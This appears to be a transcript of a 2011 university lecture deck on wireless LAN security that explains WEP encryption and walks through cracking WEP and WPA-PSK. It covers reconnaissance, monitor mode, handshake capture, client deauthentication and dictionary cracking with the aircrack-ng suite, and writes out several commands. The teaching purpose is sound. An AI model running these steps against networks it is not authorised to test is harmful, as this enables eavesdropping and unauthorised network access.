Presentation is loading. Please wait.

Presentation is loading. Please wait.

1 WLAN Security: Cracking WEP/WPA รศ. ดร. อนันต์ ผลเพิ่ม Assoc. Prof. Anan Phonphoem, Ph.D. Computer Engineering.

Similar presentations


Presentation on theme: "1 WLAN Security: Cracking WEP/WPA รศ. ดร. อนันต์ ผลเพิ่ม Assoc. Prof. Anan Phonphoem, Ph.D. Computer Engineering."— Presentation transcript:

1 1 WLAN Security: Cracking WEP/WPA รศ. ดร. อนันต์ ผลเพิ่ม Assoc. Prof. Anan Phonphoem, Ph.D. Computer Engineering Department Kasetsart University, Bangkok, Thailand Wireless LANs 2011

2 WEP Block Diagram 2 WEP Frame Integrity Algorithm (CRC-32) Pseudo-Random Number Generator RC-4 + Bitwise XOR Plain Text Cipher Text Integrity Check Value (ICV) Key Sequence Secret Key (40-bit or 128-bit) Initialization Vector (IV) IV Encryption Block Sender Site Integrity Algorithm Pseudo-Random Number Generator Bitwise XOR Cipher Text Plain Text Integrity Check Value (ICV) Key Sequence IV Secret Key (40-bit or 128-bit) Decryption Block Receiver Site

3 3 WEP – Encoding Integrity Algorithm (CRC-32) Pseudo-Random Number Generator RC-4 + Bitwise XOR Plain Text Cipher Text Integrity Check Value (ICV) Key Sequence Secret Key (40-bit or 128-bit) Initialization Vector (IV) IV

4 4 WEP Frame Frame Header IV Header Frame Body ICV Trailer FCS Encrypted Clear Text 4 bytes

5 5 WEP – Decryption Integrity Algorithm Pseudo-Random Number Generator Bitwise XOR Cipher Text Plain Text Integrity Check Value (ICV) Key Sequence IV Secret Key (40-bit or 128-bit)

6 Cracking WEP 6

7 7 Cracking Steps 1)Reconnaissance (Collect target info.) [kismet] 2)Run promiscuous mode [iwconfig, airmon] 3)Collect data [airodump] 4)Crack key [aircrack]

8 8 Default SSIDs

9 9 1) Reconnaissance (Collect target info.)

10 10 Kismet (Reconnaissance)

11 11 Kismet (AP Info.)

12 12 Kismet (Client Info.)

13 13 2) Run promiscuous mode

14 Regular Behavior Station 1 transmits to all (broadcast)

15 Intention to Eavesdrop Promiscuous mode Station 1 transmits to station 4

16 16 iwconfig

17 iwlist 17

18 Promiscuous Mode Setup By using iwconfig 18

19 Promiscuous Mode Setup By using airmon-ng 19

20 Promiscuous Mode Setup 20

21 21 3) Collect data

22 22 airodump From Kismet

23 Airodump problem airodump-ng mon0 ioctl(SIOCSIFFLAGS) failed: Operation not possible due to RF-kill /dev/rfkill is “Linux ‘s Subsystem kernel for controlling radio transmisster (activated/deactivated)” rfkill list 0: phy0: Wireless LAN Soft blocked: no  software can reactivate Hard blocked: no  software cannot reactivate 1: acer-wireless: Wireless LAN Soft blocked: no Hard blocked: no 2: acer-bluetooth: Bluetooth Soft blocked: no Hard blocked: no 4: hci0: Bluetooth Soft blocked: no Hard blocked: no Solve by: rfkill unblock all 23

24 24 airodump

25 25 airodump data files

26 26 4) Crack Key

27 aircrack For non-encryption 27

28 28 aircrack

29 29 WEP Cracking Demo

30 Cracking WPA 30

31 Cracking Steps 1) Start the wireless interface in monitor mode on the specific AP channel 2) Start airodump-ng on AP channel with filter for bssid to collect authentication handshake 3) Use aireplay-ng to deauthenticate the wireless client 4) Run aircrack-ng to crack the pre-shared key using the authentication handshake 31

32 32 1) Start Monitoring Mode

33 Check interface 33

34 iwconfig 34

35 Start monitoring mode 35

36 36 2) Start airodump-ng collect authentication handshake

37 Start airodump-ng 37 Moose# airodump-ng -c 6 --bssid 00:1E:F7:xx:xx:xx -w psk mon0 ParameterDescription -c 6Wireless channel --bssid 00:1E:F7:xx:xx:xxAP’s MAC -w pskFile name prefix (contain Ivs) mon0Interface name

38 Start airodump-ng less parameter 38 Moose# airodump-ng -w psk mon0

39 39 3) Deauthenticate client

40 aireplay 40 Moose# aireplay-ng a 00:12:01:xx:xx:xx -c 00:23:11:xx:xx:xx mon0 ParameterDescription -0deauthentication 1# deauthentication sent -a 00:12:01:xx:xx:xxAP’s MAC -c 00:23:11:xx:xx:xxDeauthing client’s MAC- mon0Interface name

41 41 4) Crack

42 Need a dictionary 42 Moose# aircrack-ng –b 00:12:01:xx:xx:xx -psk*.cap

43 With dictionary 43 Moose# aircrack-ng -w password.lst -psk*.cap

44 Handshake found 44

45 Successfully Crack 45


Download ppt "1 WLAN Security: Cracking WEP/WPA รศ. ดร. อนันต์ ผลเพิ่ม Assoc. Prof. Anan Phonphoem, Ph.D. Computer Engineering."

Similar presentations


Ads by Google